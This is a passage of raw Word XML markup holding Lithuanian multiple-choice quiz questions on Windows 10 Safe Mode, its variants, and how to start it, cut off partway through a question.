          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">režimas, kuris </w:t>
      </w:r>
      <w:r w:rsidR="00544E09" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>išsprendžia</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> visas </w:t>
      </w:r>
      <w:r w:rsidR="00AB3FC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>problemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31743D4C" w14:textId="506A6BF9" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="3B95156D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559FC264" w14:textId="2437444E" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="00407DA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="78782317" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pasirinkite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">teisingą </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>saugiojo režimo</w:t>
      </w:r>
      <w:r w:rsidR="7EF31386" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (SafeMode)</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> versij</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ą.</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A56369" w14:textId="37B3598C" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="04DF9AD1" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">augusis režimas su tinklu </w:t>
      </w:r>
      <w:r w:rsidR="4D257E25" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ir </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>saugusis režimas su</w:t>
      </w:r>
      <w:r w:rsidR="57EAF608" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vaizdo plokštės</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tvarkyklėmis</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE18266" w14:textId="071C2D74" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Saugusis režimas ir saugusis režimas su ugniasiene</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC1E8A" w14:textId="134B5814" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="032A991A" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Saugusis režimas su ugniasiene</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir saugusis režimas su tinklu</w:t>
      </w:r>
      <w:r w:rsidR="1CB69F0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3CACA9" w14:textId="506A6BF9" w:rsidR="00407DA3" w:rsidRPr="005A5C28" w:rsidRDefault="00407DA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C8926A" w14:textId="2CBB1032" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="00407DA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kaip </w:t>
      </w:r>
      <w:r w:rsidR="00067BD2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kompiuteris paleidžiamas saugiuoju režimu „Windows 10“ sistemoje</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Perskaitykite aprašymą</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/instrukciją</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD76766" w14:textId="3975A529" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paspausdami klaviatūros „Windows“ logotipo klavišą</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ I atidarykite langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei nepavyko, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">pasirinkite mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pradžia</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tada pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Naujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Atkūrimas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Išplėstinė paleistis</w:t>
      </w:r>
      <w:r w:rsidR="0032238D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidarykite atkūrimo parametrus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE4576" w14:textId="27E46863" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paspausdami klaviatūros „Windows“ logotipo klavišą</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ L atidarykite langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei nepavyko, pasirinkite mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pradžia,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tada pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Naujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Atkūrimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Išplėstinė paleistis</w:t>
      </w:r>
      <w:r w:rsidR="0032238D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidarykite atkūrimo parametrus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B846735" w14:textId="55A25497" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="1B806B53" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Paspausdami klaviatūros „Windows“ logotipo klavišą</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">+ W atidarykite langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei nepavyko, pasirinkite mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Pradžia</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tada pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Naujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Atkūrimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Išplėstinė paleistis</w:t>
      </w:r>
      <w:r w:rsidR="0032238D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atidarykite atkūrimo parametrus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F71E0BE" w14:textId="506A6BF9" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="3B95156D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A457D5E" w14:textId="3D2914E4" w:rsidR="00FE1942" w:rsidRPr="005A5C28" w:rsidRDefault="00407DA3" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="04FC34A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Užbaikite sakinį</w:t>
      </w:r>
      <w:r w:rsidR="00F81D0B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="04FC34A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Saugusis režimas su tinklu...</w:t>
      </w:r>
      <w:r w:rsidR="3D3A8374" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006670B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidR="00FE1942" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7179C11E" w14:textId="60833EC1" w:rsidR="3B95156D" w:rsidRPr="005A5C28" w:rsidRDefault="26BCF588" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tai saugusis diagnostikos režimas, kai </w:t>
      </w:r>
      <w:r w:rsidR="3D3A8374" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="1B806B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
